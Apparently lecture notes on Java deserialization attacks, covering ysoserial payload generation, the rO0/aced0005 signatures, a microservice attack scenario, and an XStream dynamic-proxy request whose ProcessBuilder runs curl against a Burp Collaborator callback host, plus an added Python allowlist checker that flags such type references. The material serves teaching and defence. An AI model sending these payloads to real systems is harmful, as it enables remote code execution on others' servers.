The bane of Java applications
root@kali# java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
Possible sources:
- Java object deserialization (ObjectInputStream.readObject) or similar libraries that rebuild arbitrary object graphs from input
- XML protocols or other data-transfer formats that let the sender choose which types get instantiated
Simplest data flows:
data -> deserializer
data -> encoded string (base64, hex, URL-encoding) -> deserializer
weak tokens (e.g. a guessable MAC key) -> signature forgery -> deserialization of the forged blob
Not only rO0*
- XML, as in the Apache Struts 2 REST plugin RCE (XStream)
- in general, any dynamic object builder that instantiates types named in the input
- dynamically loaded files, combined with a write vulnerability
- in general, any dynamic code execution
* rO0 is the base64 of the first three bytes of the Java serialization stream magic 0xACED0005; a base64-encoded stream begins with rO0AB, a hex-encoded one with aced0005.
A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing the user state and passing it back and forth with each request. An attacker notices the “rO0” Java object signature (in base64) and uses the Java Serial Killer tool to gain remote code execution on the application server.
Simple deserialization exploitation demo
lab: https://github.com/vulhub/vulhub/tree/master/mojarra/jsf-viewstate-deserialization
gadget structure https://gist.github.com/frohoff/24af7913611f8406eaf3
XML deserialization
request example (XStream unmarshalling a dynamic proxy whose handler runs ProcessBuilder.start):
POST /api/contacts HTTP/1.1
Host: localhost
Content-Type: application/xml
Accept: application/xml

<dynamic-proxy>
<interface>org.insecurelabs.api.contacts.Contact</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command><string>/usr/bin/curl</string><string>http://[yourid].burpcollaborator.net</string></command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
More at http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/
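A wire-level check for the XStream pattern above, as an added Python example that is neither the page's nor XStream's code. It lists every type an XStream document can ask the unmarshaller to instantiate (element tags that are fully-qualified class names or the dynamic-proxy alias, class="..." attributes, and the interface names of a dynamic proxy) and reports those outside an allowlist. The request body is the page's payload reused as a constructed sample; the benign document and the allowlist are assumptions. The real fix is the same allowlist applied inside the application with XStream's security framework (addPermission / allowTypes), not a filter in front of it.

```python
"""Flag XStream type references outside an allowlist.

Added example, not from the page or from XStream. The allowlist and the
benign document are constructed; PAYLOAD is the page's request body.
"""
import xml.etree.ElementTree as ET

# Constructed allowlist: what the Contact API legitimately unmarshals.
ALLOWED_PACKAGES = ("org.insecurelabs.api.contacts.",)
ALLOWED_TYPES = {"java.lang.String", "java.util.ArrayList"}
PROXY_ALIAS = "dynamic-proxy"          # XStream alias for java.lang.reflect.Proxy


def allowed(type_name: str) -> bool:
    return type_name in ALLOWED_TYPES or type_name.startswith(ALLOWED_PACKAGES)


def type_refs(xml_text: str) -> set:
    """Every type name the document asks XStream to instantiate or implement."""
    refs = set()
    for el in ET.fromstring(xml_text).iter():
        if el.tag == PROXY_ALIAS or "." in el.tag:   # <java.lang.ProcessBuilder> style tags
            refs.add(el.tag)
        cls = el.get("class")                         # class="java.beans.EventHandler"
        if cls:
            refs.add(cls)
        if el.tag == "interface" and el.text:         # proxy interface list
            refs.add(el.text.strip())
    return refs


def disallowed_refs(xml_text: str) -> set:
    """Type references that the allowlist does not cover; empty means the body is clean."""
    return {r for r in type_refs(xml_text) if not allowed(r)}


# The page's payload, reused here as a constructed sample body.
PAYLOAD = """<dynamic-proxy>
<interface>org.insecurelabs.api.contacts.Contact</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command><string>/usr/bin/curl</string><string>http://[yourid].burpcollaborator.net</string></command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>"""

# Constructed benign request for the same endpoint.
BENIGN = """<org.insecurelabs.api.contacts.Contact>
<name>Alice</name>
<phones class="java.util.ArrayList"><string>555-0100</string></phones>
</org.insecurelabs.api.contacts.Contact>"""

if __name__ == "__main__":
    print("payload ->", sorted(disallowed_refs(PAYLOAD)))
    print("benign  ->", sorted(disallowed_refs(BENIGN)))
```

ElementTree is used for brevity; a real gateway parsing untrusted XML should use defusedxml or an equivalently hardened parser, since entity expansion is a separate problem from the type question this check answers.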